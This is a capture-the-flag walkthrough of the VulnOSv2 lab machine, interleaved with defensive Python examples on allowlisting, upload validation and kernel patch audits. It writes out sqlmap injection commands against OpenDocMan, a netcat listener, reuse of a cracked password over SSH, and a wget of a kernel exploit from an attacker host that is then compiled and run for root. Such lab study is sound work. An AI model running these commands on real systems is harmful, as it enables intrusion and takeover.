VulnOSv2

Enumeration

Let’s start with nmap to determine what services are running.

nmap -p- -sV 192.168.2.14

[screenshot: nmap output]

So there is a web server, SSH and IRC running.
Let’s start off with the web server.

WEB

dirb http://192.168.2.14/jabc/

There are a lot of directories but none really stick out. Time to look at all the pages.
On 192.168.2.14/jabc/?=node/7 there is an empty page.
But when looking at the source (or pressing CTRL+A to select the hidden text) there is a hidden message which refers to another site with login possibilities (guest:guest).

http://192.168.2.14/jabcd0cs/

At first glance there is a notice showing what the site is running on:
OpenDocMan v1.2.7 → document management software.
Let’s see what there is to find about this piece of software on exploit-db.

https://www.exploit-db.com/exploits/32075/

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.

SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of the “add_value” HTTP GET parameter in the “/ajax_udf.php” script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application’s database.
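The bug class the advisory describes, as an added illustration that is not OpenDocMan’s code: a request parameter used as a table name cannot be bound with a query placeholder, so it has to be checked against a fixed allowlist before it reaches the SQL text. The in-memory schema, the rows, the second table and the allowlist below are constructed for the example (only the name odm_user comes from this page), and the assumption that add_value is pasted straight into the query is the illustration’s, not a statement about how ajax_udf.php is written.

```python
import sqlite3


def build_sample_db():
    """Constructed in-memory stand-in for the application's database (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE odm_user (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO odm_user VALUES (?, ?, ?)",
        [(1, "webmin", "<md5 placeholder>"), (2, "guest", "<md5 placeholder>")],
    )
    conn.execute("CREATE TABLE odm_department (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO odm_department VALUES (1, 'Sales')")
    return conn


def lookup_vulnerable(conn, add_value):
    """The weak pattern: the table name comes straight from the request.

    Whatever the client sends becomes part of the SQL text, so the client
    decides which table is read and can append further SQL after the name.
    """
    sql = "SELECT id FROM " + add_value
    return conn.execute(sql).fetchall()


# Hypothetical allowlist of the only table this endpoint is meant to touch.
ALLOWED_TABLES = frozenset({"odm_department"})


def lookup_hardened(conn, add_value):
    """Identifiers cannot be bound with '?', so validate against the allowlist
    and then quote the identifier so it can only ever be read as a name."""
    if add_value not in ALLOWED_TABLES:
        raise ValueError("unexpected table name: %r" % add_value)
    quoted = '"' + add_value.replace('"', '""') + '"'
    return conn.execute("SELECT id FROM " + quoted).fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    print("vulnerable, client picks odm_user:", lookup_vulnerable(db, "odm_user"))
    print("vulnerable, trailing SQL accepted:", lookup_vulnerable(db, "odm_department WHERE 1=0"))
    print("hardened, intended table:", lookup_hardened(db, "odm_department"))
    try:
        lookup_hardened(db, "odm_user")
    except ValueError as err:
        print("hardened, rejected:", err)
```

The hardened version rejects anything outside the allowlist rather than trying to sanitise the string: for identifiers there is no escaping rule that makes an arbitrary value safe, so the only sound check is membership in a list the application controls.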

So there is a SQL injection possible via the add_value parameter. Let’s start up sqlmap.

sqlmap -u 'http://192.168.2.14/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -p add_value --current-db

[screenshot: sqlmap output, current database]

sqlmap -u 'http://192.168.2.14/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -p add_value -D jabcd0cs --dump

[screenshot: sqlmap output, table dump]

A quick lookup on md5decrypt.org shows that the hash corresponds to:
webmin1980

Let’s upload a shell file.
Hmmmm…..restricted. Oh well.
Let’s adjust the filter types.

Add document: text/x-php

Let’s try again.
Success!!!!

Now let’s start listening.

nc -lvnp 31337

And let’s view the document.
Crap….only option is downloading it. Not running it.
That’s no good.
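What stopped the upload route from going anywhere is the application serving stored documents as downloads instead of executing them. As an added example (not OpenDocMan’s code), the upload policy below shows the other controls that belong next to that: refusing interpreter extensions regardless of any admin-editable MIME allowlist, checking the declared type and the file’s magic bytes, storing under a random name, and serving with an attachment header. The extension sets, allowlist and sample inputs are constructed for the example.

```python
import re
import secrets

# Extensions a web server might hand to an interpreter. Refused regardless of
# any runtime-editable MIME allowlist, because widening such a list is exactly
# what the walkthrough did to get the file accepted.
EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl", "py",
    "sh", "jsp", "jspx", "asp", "aspx", "htaccess",
})

# Hypothetical fixed allowlist: extension -> (accepted declared MIME types, magic bytes).
# A magic value of None means only the extension and declared type are checked.
ALLOWED_TYPES = {
    "pdf": ({"application/pdf"}, b"%PDF-"),
    "png": ({"image/png"}, b"\x89PNG\r\n\x1a\n"),
    "txt": ({"text/plain"}, None),
}


def validate_upload(filename, declared_mime, content):
    """Return (accepted, reason). The declared MIME type is client-controlled,
    so it can only cause a rejection, never an acceptance on its own."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    extensions = base.split(".")[1:]
    if not extensions:
        return False, "missing extension"
    # Check every extension so "report.php.txt" is caught as well as "shell.php".
    if any(ext in EXECUTABLE_EXTENSIONS for ext in extensions):
        return False, "executable extension"
    ext = extensions[-1]
    if ext not in ALLOWED_TYPES:
        return False, "type not allowed"
    mimes, magic = ALLOWED_TYPES[ext]
    if declared_mime not in mimes:
        return False, "declared type does not match extension"
    if magic is not None and not content.startswith(magic):
        return False, "content does not match extension"
    return True, "ok"


def storage_name(ext):
    """Random on-disk name: the uploader's filename never reaches the filesystem."""
    return "%s.%s" % (secrets.token_hex(16), ext)


def download_headers(original_name):
    """Serve stored documents as attachments: the browser downloads, nothing executes."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", original_name)
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": 'attachment; filename="%s"' % safe,
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print(validate_upload("shell.php", "text/x-php", b"<?php /* constructed */ ?>"))
    print(validate_upload("report.pdf", "application/pdf", b"%PDF-1.4 constructed"))
    print(storage_name("pdf"))
    print(download_headers("r00t.blend"))
```

Storing uploads outside the web root and serving them through a handler that sets these headers is what keeps a file that slipped past the type checks from ever being run by the server.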

SSH

So let’s try this angle.

ssh -p 22 -l webmin 192.168.2.14
password: webmin1980

Let’s get a proper shell.

python -c 'import pty;pty.spawn("/bin/bash")'

Let’s look around. There are some interesting directories:
/vulnosadmin
and of course /root

Both restricted. Let’s get root.

lsb_release -a

[screenshot: lsb_release output]

We know the server runs on Ubuntu 14.04.
So let’s try the overlayfs exploit (https://www.exploit-db.com/exploits/37292/).

cd /tmp
wget http://192.168.2.9/overlayfs.c
gcc overlayfs.c -o overlayfs
chmod 755 overlayfs
./overlayfs

[screenshot: root shell]

Et voila……root!
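The same information from the defending side, as an added example that is not part of the walkthrough: the reason this worked is a kernel below the fixed package version, and that is a check an inventory script can run. Ubuntu release strings such as 3.13.0-24-generic carry the ABI number after the dash, and comparing them as strings orders them wrongly once that number passes 99, so the helper parses them into integer tuples. The inventory is constructed, and PLACEHOLDER_MINIMUM is a placeholder to be replaced with the fixed version from the vendor advisory for the CVE in question.

```python
import re

KERNEL_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)")


def parse_ubuntu_kernel(uname_r):
    """'3.13.0-24-generic' -> (3, 13, 0, 24): upstream version plus the Ubuntu ABI number."""
    match = KERNEL_RE.match(uname_r.strip())
    if not match:
        raise ValueError("not an Ubuntu-style kernel release string: %r" % uname_r)
    return tuple(int(part) for part in match.groups())


def is_at_least(uname_r, minimum):
    """True when the running kernel is at or above the minimum patched release.
    Tuples compare numerically, so 3.13.0-100 correctly ranks above 3.13.0-55."""
    return parse_ubuntu_kernel(uname_r) >= parse_ubuntu_kernel(minimum)


def audit_hosts(inventory, minimum):
    """inventory: {hostname: output of `uname -r`}. Returns hosts still below the minimum."""
    return sorted(host for host, release in inventory.items() if not is_at_least(release, minimum))


# Constructed inventory of uname -r values; not real hosts.
SAMPLE_INVENTORY = {
    "vulnosv2": "3.13.0-24-generic",
    "build01": "3.13.0-100-generic",
    "web02": "3.13.0-55-generic",
}
# Placeholder: substitute the fixed kernel version from the vendor advisory.
PLACEHOLDER_MINIMUM = "3.13.0-55-generic"


if __name__ == "__main__":
    print("hosts below minimum:", audit_hosts(SAMPLE_INVENTORY, PLACEHOLDER_MINIMUM))
```

Run against real inventory data, the list this returns is the set of hosts where the exploit path shown above is still open; the fix is the vendor kernel update, and the check only tells you where it has not landed yet.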

Now let’s check those dirs again.
The dir vulnosadmin has a strange file in it: r00t.blend

file r00t.blend
r00t.blend: Blender3D, saved as 32-bits little endian with version 2.77

The root directory holds the flag:

[screenshot: flag]

Nice!!!
